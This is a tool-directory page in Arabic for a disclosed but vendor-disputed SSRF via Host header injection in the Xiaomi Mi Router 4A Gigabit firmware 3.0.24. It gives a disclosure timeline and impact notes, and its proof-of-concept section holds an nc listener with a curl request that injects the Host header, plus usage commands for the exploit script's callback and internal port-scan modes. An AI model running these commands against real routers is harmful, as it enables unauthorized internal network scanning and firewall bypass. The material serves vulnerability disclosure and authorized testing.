Skip to content
KitploitKITPLOIT
أدواتالمدونة
إرسال
أدواتالمدونة
إرسال

أدوات الاختراق واختبار الاختراق والأمن السيبراني لترسانتك الأمنية!

Kitploit هو دليل لأدوات الاختراق والأمن السيبراني واختبار الاختراق. اكتشف آخر تحديثات المشاريع للعثور على الثغرات وتحليل الأنظمة وأتمتة الاختبارات وتعزيز أمنك.

··الخلاصات·اتصال·الخصوصية·© 2026 Kitploit

دليل الأدوات

الفئات

عرض جميع الفئات
Loading categories
CVE-2026-26898-Xiaomi-SSRF-HostHeaderInjection — SSRF غير موثَّق في راوتر Xiaomi Mi Router 4A Gigabit Edition (البرنامج الثابت 3.0.24) عبر حقن رأس المضيف — CVE-2026-26898 | Kitploit
أدوات/GitHubGitHub/iwallplace/cve-2026-26898-xiaomi-ssrf-hostheaderinjection
تحليل الثغرات الأمنيةالاستغلالاستغلال تطبيقات الويبأمن الشبكاتاختبار الاختراقالفريق الأحمر
GitHubiwallplace/cve-2026-26898-xiaomi-ssrf-hostheaderinjection

CVE-2026-26898-Xiaomi-SSRF-HostHeaderInjection

SSRF غير موثَّق في راوتر Xiaomi Mi Router 4A Gigabit Edition (البرنامج الثابت 3.0.24) عبر حقن رأس المضيف — CVE-2026-26898

عرض المستودع
111منذ 3 أشهرلم تتم المراجعة بعد

الأكثر شعبية

عرض الكل →

اكتشف الأدوات الأكثر استخدامًا من قبل مجتمعنا.

استكشف جميع الأدوات

تصفح مجموعتنا من الأدوات

عرض جميع الأدوات →
مشاركة

CVE-2026-26898: جهاز توجيه Xiaomi Mi Router 4A Gigabit - هجوم تزوير الطلب من الخادم (SSRF) عبر حقن رأس المضيف

Vulnerability CVSS Status Vendor

ملخص

توجد ثغرة أمنية من نوع تزوير الطلب من الخادم (SSRF) في جهاز التوجيه Xiaomi Mi Router 4A Gigabit Edition. تفشل واجهة الويب الخاصة بجهاز التوجيه في التحقق من رأس HTTP Host، مما يسمح لمهاجم غير موثَّق بإجبار جهاز التوجيه على إجراء اتصالات TCP صادرة عشوائية.

الحقلالقيمة
الجهازXiaomi Mi Router 4A Gigabit Edition
البرنامج الثابت3.0.24 (دولي)
CVECVE-2026-26898 (متنازع عليه — انظر حالة الإفصاح أدناه)
CWECWE-918 (تزوير الطلب من الخادم)
CVSS 3.18.6 (عالي) — تقييم الباحث؛ البائع يطعن في شدة الخطورة

استجابة البائع وحالة الإفصاح

الحالة: متنازع عليه من قبل البائع — لم يتم قبول هذا التقرير من قبل Xiaomi.

  • تم الإبلاغ إلى Xiaomi عبر HackerOne (التقرير #3513458) بتاريخ 2026-01-16.
  • في 2026-01-23، أغلقت Xiaomi التقرير كمعلومة إعلامية، مشيرة إلى أنها مشكلة معروفة سابقًا، وأن جهاز التوجيه "لا يزال يعتمد على وظيفة الوكيل"، وأنهم يصنفونها على أنها منخفضة المخاطر ولن يتم معالجتها.
  • موقف الباحث: شدة الخطورة محل خلاف. لا يزال الجهاز يُباع بنشاط على قنوات Xiaomi الرسمية (mi.com/tr) اعتبارًا من يناير 2026، ونقطة النهاية يمكن الوصول إليها بدون مصادقة، وتمكّن SSRF من فحص الشبكة الداخلية والوصول إلى الخدمات التي تثق في الاتصالات المحلية. لا يزال السلوك غير مصحح.

يُستخدم CVE-2026-26898 هنا لأغراض التتبع فقط؛ نظرًا لخلاف البائع، يجب التعامل معه كـ متنازع عليه / غير مؤكد، وليس مؤكدًا من البائع.

نقطة النهاية المتأثرة

root@kitploit:~
GET /cgi-bin/luci/api/xqsystem/login HTTP/1.1
Host: <ATTACKER_IP>:<PORT>

إثبات المفهوم

لقطة شاشة

عرض توضيحي للاستغلال

اختبار سريع

root@kitploit:~
python3 xiaomi_ssrf_exploit.py --target 192.168.31.1 --check

المخرجات

root@kitploit:~
[*] Checking vulnerability on 192.168.31.1...
[*] Local IP: 192.168.31.235
[*] Test Port: 44444
[+] VULNERABLE! Router connected back to 192.168.31.235:44444

اختبار يدوي

root@kitploit:~
# Terminal 1: Start listener
nc -l 4444

# Terminal 2: Send malicious request
curl -H "Host: YOUR_IP:4444" "http://192.168.31.1/cgi-bin/luci/api/xqsystem/login"

التأثير

  • مسح الشبكة الداخلية: استخدام جهاز التوجيه كوكيل لمسح الشبكات الداخلية
  • تجاوز جدار الحماية: الوصول إلى الخدمات المقيدة بعنوان IP الخاص بجهاز التوجيه
  • سلسلة الهجوم: يمكن دمجها مع ثغرات أخرى لتحقيق تنفيذ تعليمات برمجية عن بُعد (RCE)

الملفات

الملفالوصف
xiaomi_ssrf_exploit.pyاستغلال كامل مع أوضاع متعددة

استخدام الاستغلال

root@kitploit:~
# Check if vulnerable
python3 xiaomi_ssrf_exploit.py --target ROUTER_IP --check

# Callback mode
python3 xiaomi_ssrf_exploit.py --target ROUTER_IP --callback YOUR_IP --port 4444

# Port scanner
python3 xiaomi_ssrf_exploit.py --target ROUTER_IP --scan TARGET_IP --ports 22,23,80,443

الجدول الزمني

التاريخالحدث
2026-01-15اكتشاف الثغرة؛ تطوير إثبات المفهوم
2026-01-16الإبلاغ إلى Xiaomi عبر HackerOne (#3513458)
2026-01-23أغلقت Xiaomi التقرير كمعلومة إعلامية (مخاطر منخفضة، لن يتم الإصلاح)
2026-06-03نشر إعلان عام (هذا المستودع) — متنازع عليه من البائع، غير مصحح

المراجع

  • تقرير HackerOne #3513458 (مقدم إلى Xiaomi؛ مغلق كمعلومة إعلامية)
  • CWE-918: تزوير الطلب من الخادم (SSRF)

إخلاء مسؤولية

هذا الاستغلال مقدم للأغراض التعليمية واختبارات الأمان المصرح بها فقط. الوصول غير المصرح به إلى أنظمة الكمبيوتر غير قانوني.

المؤلف

Ahmet Mersin
🌐 ahmetmersin.com
🐙 @iwallplace

تنزيل الأداة